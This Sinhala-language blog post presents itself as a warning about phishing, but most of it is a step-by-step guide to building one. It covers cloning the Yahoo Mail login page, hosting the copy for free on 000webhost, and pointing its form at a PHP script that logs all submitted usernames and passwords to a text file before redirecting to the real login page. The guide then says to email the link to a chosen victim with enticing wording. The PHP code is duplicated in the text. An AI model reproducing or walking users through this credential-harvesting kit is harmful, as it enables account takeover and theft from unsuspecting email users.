අද වෙනකොට අන්තර්ජාලයේ සැරිසරන එක මහා භයානක දෙයක් බවට පත් වෙලා. මොකද හැමතැනම අපේ මුරපද හොරාගන්න, අපේ ඊමේල් ගිණුම් හැක් කරගන්න, අපේ අන්තර්ජාල ගෙවීම් වගේ දේවල් වල විස්තර ගන්න, පරිගණක ජාලයේ තදබදය වැඩි කරන්න බලාගෙන ඉන්න හැකර්ලා හැමතැනම. ඉතින් මං හැකින් ගැන හුගක් විස්තර කියලා තියනවා වගේම ඔයාලා හැක් කරන්න ගිහින් හැක් වෙන හැටිත් කියලා තියනවා. මේ පෝස්ට් එකෙන් මං ලියන්න යන්නේ කොහොමද අපිව හැක් කර ගන්න හැකර් කෙනෙක් භාවිතයේ පවතින ජනප්රිය වෙබ් අඩවි භාවිතා කරන්නේ කියලා. ඉතින් සරලවම කියනවා නම් ෆිෂින් ප්රහාරයක් එල්ල කරන්නේ කොහොමද කියන එක.
ඉතින් මේක කියවන ඔයාල කියවල මේක ප්රයෝගිකව කරන්නත් උත්සහා කරනවා නම් වෙන කෙනෙක් හැක් කරන්න බාවිතා කරන්න එපා. මට කියන්න ඕනේ කම තියෙන්නේ මේ වගේ වෙබ් අඩවි අටවගෙන ඕනේ තරම් කට්ටිය අන්තර්ජාලයේ ඉන්න බවත් ඒවාට අහු වෙන්න එපා කියන එකත්.
හැකර් කෙනෙක්ට මේ දේ කරන්න ඕනේ කරන දේවල් කීපයක් තියනවා.
1. වෙබ් අඩවියක් හෝස්ට් කරන්න පුලුවන් ගිණුමක්
ඉතින් අදවෙනකොට නොමිලේ වෙබ් අඩවි දියත් කරන්න එහෙම නැත්නම් හෝස්ට් කරන්න දෙන වෙබ් අඩවි ඕනේ තරම් හොයාගන්න පුලුවන්. ඉතින් ඒ වගේ වෙබ් අඩවියක් හොයාගෙන ඒකේ ලියපදිංචි වෙන්න. කිසිම විටක ලියපදිංචියේදී භාවිතයේ පවතින ජනප්රිය නාමයන් වෙබ් අඩවි ලිපිනය විදියට බාවිතා කරන්න එපා. යාහූ ගූගල් වගේ දේවල් බාවිතා කරන්න එප. ඉතින් මේ උදාහරණයට ඕනේ ගිණුම හදන්නේ www.000webhost.com කියන web අඩවියෙ. ඔයාලටත් මේකෙන් නොමිලේ හොස්ටින් ගිණුමක් හදාගන්න පුලුවන්.
2. බොරු login page එකක්
යම් ගිණුඅමකට ලොග් වෙන්න නම් login page එකක් තියෙන්නෙ ඕනේ. ඔයාලා දන්නවා යාහු මේල් වලට, පේස්බුක් වලට මෙ හැම එකකටම login page එකක් තියනවා. ඉතින් මේ Fishing Attack එකකටත් බොරු login page එකක් හදාගන්න වෙනවා ඒකට අපිට පුලුවන් පහල ක්රමය අනුගමනය කරන්න.
භාවිතා වෙන login page එකකට යන්න. මං උදාහරණයට ගන්නේ යාහූ මේල් වල login page එක
ඊලගට ඒ login page එක උඩ Right Click කරලා view source යන්න. එතනදී මේ පේජ් එකට අදාල සෝස් කෝඩ් එක පෙන්නනවා.
ඊලගට මේ සම්පූර්ණ සෝස් කෝඩ් එක කොපි කරගෙන notepad එකක පේස්ට් කරගන්න. ඒ ගොනුව .html ගොනුවක් ලෙසින් සුරක්ශිත කරන්න. මගේ උදාහරණයේදී මං භාවිතා කරන්නේ yahoo.html ලෙසයි
3. php කේත ගොනුවක්
පහල දැක්වෙන කේත් සටහන් ටික කොපි කරගෙන notepad එකක පේස්ට් කරගන්න. ඒ ගොනුව code.php ලෙසින් සුරක්ශිත කරන්න.
<?php
header (‘Location: original login page’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
header (‘Location: original login page’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
4. හිස් ටෙස්ට් ෆයිල් ගොනුවක්
මොනවත් නැති හිස් ටෙස්ට් ෆයිල් ගොනුවක් සාදා එය password.txt ලෙස සුරක්ශිත කරන්න.
ඉතින් මේ වෙනකොට ගොනු 3ක් ඔයාලා ගාව තියනවා. yahoo.html , password.txt සහ code.php ඉතින් අපි බලමු මේවාගේ කේත කොටස් වෙනස් කරගන්න විදිය සහ මේ ගොනු 3 ම් එකිනෙක සම්බන්ද කරන ආකාරය. මුලින්ම yahoo.html එක නෝට්පෑඩ් එකෙන් ඕපන් කරගන්න.
ඊලගට ctrl+F සෙවුමක් පටන් ගන්න. එතනදී අපි හොයන්නේ action කියන කොටස. පහල රූපයේ මෙන් අපිට ඒක හොයාගන්න් පුලුවන්. මේ වගෙම නොවුනත් මීට සමානව අපිට මෙ කේතය බලාගන්න පුලුවන්.
ඊලගට මේ රතුපාටින් දක්වල තියන කොටස වෙනුවට පහල් රූපයේ තියන රතු පාටින් තියන කොටස යොදන්න.
හරි, ඊලගට මේ ගොනුව සේවු කරන්න. ඉන්පසු code.php ගොනුව ඕපන් කරගන්න. එතන ඇති original login page කියන එක වෙනුවට https://login.yahoo.com/config/login_verify2?&.src=ym කියන එක එහෙම නැත්නම් ඉහල රූපයේ රතු පාටින් දක්වල තියන https: ලෙසින් පටන් ගන්න කොටස යොදන්න.
හරි, කේත කොටස් වෙනක් කිරීම් කරල ඉවර උනාට පස්සේ අපිට පුලුවන් මේ ගොනු 3 ම අපි මුලින්ම හදාගත්ත වෙබ් හෝස්ටින් ගිණුමට එකතු කරන්න.
හදාගත්ත ගිණුමට ලොග් වෙලා එහි file manager වලට යන්න. පහල රූපයේ මෙන් පෙන්නයි.
ඊලගට අලුත් ඩිරෙක්ටරියක් හදන්න. මං හදන්නේ abc කියලා
ඊලගට අපි හදාගත් ගොනු 3 ම Upload කරන්න.
ඊලගට අපිට පෙන්නන කොටසේ ඇති .html සහ .txt වලට අදාල ලින්කු කොපි කරගන්න. .html ලින්කුවෙන් තමයි අපි කේතයන් වෙනස් කර සෑදූ බොරු Login Page එකට යන්නේ. ඉතින් මේ ලින්කුව ඔයාලට පුලුවන් හැක් කරන්න එහෙම නැත්නම් Fishing Attack එකක් දෙන්න් ඕනේ කෙනාගේ ඊමේල් ගිණුමට යවන්න ආකර්ශණීය වචන ටිකකුත් එක්ක. ඉතින් ඔයාලට පේනවා නේද වෙන දේ? අපි යවන ලින්කුව ඒක බලන කෙනා ක්ලික් කලාම ඕපන් වෙන්නේ අපි හදපු වෙබ් පිටුව. ඒකෙදි ඔහු විසින් ලබාදෙන මුරපද සියල්ල අපි හදපු password.txt ගොනුව තුල සුරක්ශිත වෙනවා. ඉතින් බලන්න ඔයාලා කොයිතරම් බරපතල අවදානමකද ඉන්නෙ කියලා? ඒ හින්දා නොදන්න ලින්කු වල ක්ලික් කරලා හැක් වෙන්න එපා.
පහල උදාහරණ වලින් බලන්න. මෙවුවා තමයි Fishing Attack විදියට එන්නේ.
.jpg)
About the authorEranda Dayawansa
.jpg)
0 comments:
Post a Comment